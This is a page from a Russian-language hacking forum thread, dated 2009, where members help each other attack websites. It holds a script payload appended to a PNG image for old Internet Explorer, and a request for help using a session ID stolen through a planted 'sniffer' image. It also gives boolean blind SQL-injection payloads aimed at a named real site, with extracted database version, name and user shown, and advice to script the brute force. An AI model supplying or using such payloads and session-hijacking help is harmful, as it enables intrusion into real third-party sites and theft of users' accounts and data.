FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 796 из 2422

796

Опции темы

Поиск в этой теме

Опции просмотра

09.07.2009, 20:56

slesh

Reservists Of Antichat - Level 6

Регистрация: 05.03.2007

Сообщений: 1,985

Провел на форуме:
3288241

Репутация: 3349

Отправить сообщение для slesh с помощью ICQ

2 diznt то, что ты видел - это возможна XSS бага старого IE
когда в конец png файла можно былобы приписать html/javascript и он выполнилсябы при просмотре данной картинке. Но этот баг вроде существовал еще во времена IE 5. если не раньше.

09.07.2009, 20:56

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

ну во-первых не gif, а png
Встаялешь в конец картинки <script>alert(/olololo/)</script>, заливаешь на сайт и смотришь картинку. Работает только в IE

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

09.07.2009, 20:59

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

Провел на форуме:
5011696

Репутация: 2221

Цитата:

Сообщение от Spyder

такое редко юзают, енто раз.

Во вторых я не думаю что на античате такое бы было %)

09.07.2009, 20:58

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

Ничего актуального тут нет - только при LFI или RFI возможно исполнить код, зашитый в картинку, без вариантов. Или загрузить .htaccess, в котором будет прописано, что .jpg или .gif или еще какое расширение будет выполняться как php-скрипт. Всё.

А баги, работавшие в IE5-6 уж точно неактуальны

09.07.2009, 21:03

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

Да как слеш написал это бага старого эксплорера, правда работало не толкьо в 5.5 но и в 6-ой версии

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

09.07.2009, 22:01

LeRick

Новичок

Регистрация: 06.06.2009

Сообщений: 7

Провел на форуме:
69905

Репутация: 2

Подскажите новичку, пожалуйста.
На одном вап-сайте вставил в форум картинку-сниффер. В логах получаю такие данные: http:/ /sait.ru/member.php?sid=7cda1b46636bc1a8d88898246a615fa6&a= forum&f=4&t=1075&
Переходил по такой ссылке в течение 1й минуты после получения, но почему-то выкидывает на главную страницу.
Можно ли вобще как-то использовать данную информацию?

09.07.2009, 22:12

Saiga

Познающий

Регистрация: 22.07.2008

Сообщений: 49

Провел на форуме:
170912

Репутация: -4

www.reznik.pri.ee/document.ph_p?id=138
Как узнать скока сталбцоф ? Пробавал черес order by . А union select никак .. Потскожыте
Или приведите пример

10.07.2009, 00:24

peonix

Познающий

Регистрация: 09.11.2008

Сообщений: 34

Провел на форуме:
36308

Репутация: 2

Цитата:

Сообщение от Saiga

эту скулю можно раскрутить толькоподбором, тоесть допустим делаем примерно такой запрс
www.reznik.pri.ee/document.php?id=138 and exists (select table_name from (select table_name from information_schema.tables where table_schema = database() limit [PARAM],1) a where ascii(substr(table_name,[SymbolNumber],1))>[GM])

все что в квадратных скобках - это переменные значения
[GM]- код символа
[Param] - думаю сам догадаешься...
[SymbolNumber] - это номер символа в текущем [Param]

примерно так, если вручную то муторно и долго...
Советую написать скрипт для перебора

Последний раз редактировалось peonix; 10.07.2009 в 00:30..

09.07.2009, 22:46

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

http://www.reznik.pri.ee/document.php?id=209+AND+SUBSTRING((version()),1,1) =5--

version: 5.1.34-log
database: np2482_reznik
user: np2482_reznik@localhost
os: pc-linux-gnu

#10

09.07.2009, 22:47

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Ckорее всего никак, т.к. JOIN

видю только слепую скулю:

Цитата:

http://www.reznik.pri.ee/document.php?id=138+and+substring(version(),1,1)=5

А вообще думать надо, кого ломаешь, там же афганцы

Страница 796 из 2422

796

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ